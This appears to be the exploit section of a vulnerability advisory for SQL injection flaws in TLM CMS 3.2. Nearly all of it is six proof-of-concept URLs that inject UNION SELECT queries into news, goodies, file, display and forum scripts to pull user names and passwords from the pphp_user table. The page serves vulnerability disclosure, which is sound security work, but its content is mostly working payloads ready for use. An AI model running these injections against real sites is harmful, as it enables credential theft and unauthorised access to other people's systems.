• info
• discussion
• exploit
• solution
• references

TLM CMS Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*
http://www.example.com/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*